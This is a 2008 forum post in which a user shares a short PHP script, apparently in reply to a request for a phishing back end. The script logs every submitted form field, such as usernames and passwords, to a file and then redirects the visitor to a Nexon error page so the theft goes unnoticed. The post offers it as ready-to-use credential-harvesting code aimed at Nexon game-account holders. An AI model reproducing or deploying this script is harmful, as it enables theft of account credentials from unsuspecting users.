View Single Post
  #3  
Old 10-13-2008, 06:00 PM
Sanjuro's Avatar
Sanjuro Sanjuro is offline
Ezudian
 
Join Date: Oct 2008
Location: Zimbabwe
Posts: 78
Reputation: 97
Sanjuro will become famous soon enough
Send a message via MSN to Sanjuro
Default

Code:
<?php
header("location: http://www.nexon.net/errorPage.html");
$handle = fopen("filenamehere. :D", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
You mean that?
Reply With Quote